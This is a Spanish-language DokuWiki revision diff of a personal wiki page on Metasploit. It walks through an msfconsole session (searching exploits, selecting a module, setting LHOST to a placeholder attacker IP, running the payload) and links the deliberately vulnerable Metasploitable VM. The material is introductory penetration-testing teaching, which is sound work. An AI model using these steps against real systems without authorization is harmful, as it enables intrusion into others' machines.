Herramientas de usuario

Herramientas del sitio


informatica:software:metasploit

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
informatica:software:metasploit [2021/09/20 12:29] – [Metasploit] tempwininformatica:software:metasploit [2021/09/20 17:05] (actual) – [Ejemplo] tempwin
Línea 9: Línea 9:
 Ejemplo de una sesión con ''mfsconsole'': Ejemplo de una sesión con ''mfsconsole'':
  
-Búsqueda en la base de datos de Metasploit para encontrar vulnerabilidades y exploits:+Búsqueda en la base de datos de Metasploit para encontrar exploits de vulnerabilidades:
  
 <code> <code>
Línea 25: Línea 25:
 <code> <code>
 use 0 use 0
 +</code>
 +
 +Ahora miramos las opciones del módulo de metasploit seleccionado:
 +
 +<code>
 +options
 </code> </code>
  
Línea 50: Línea 56:
 set LHOST <IP_ATACANTE> set LHOST <IP_ATACANTE>
 </code> </code>
 +
 +Con el comando ''options'' se pueden ver las configuraciones establecidas para el módulo de metasploit
  
 Ejecutamos el payload: Ejecutamos el payload:
Línea 56: Línea 64:
 run run
 </code> </code>
 +
 +===== Metasploitable =====
 +
 +Máquina virtual creada con un montón de vulnerabilidades para usarse con metasploit.
 +
 +  * [[https://github.com/rapid7/metasploitable3]]
informatica/software/metasploit.1632133769.txt.gz · Última modificación: por tempwin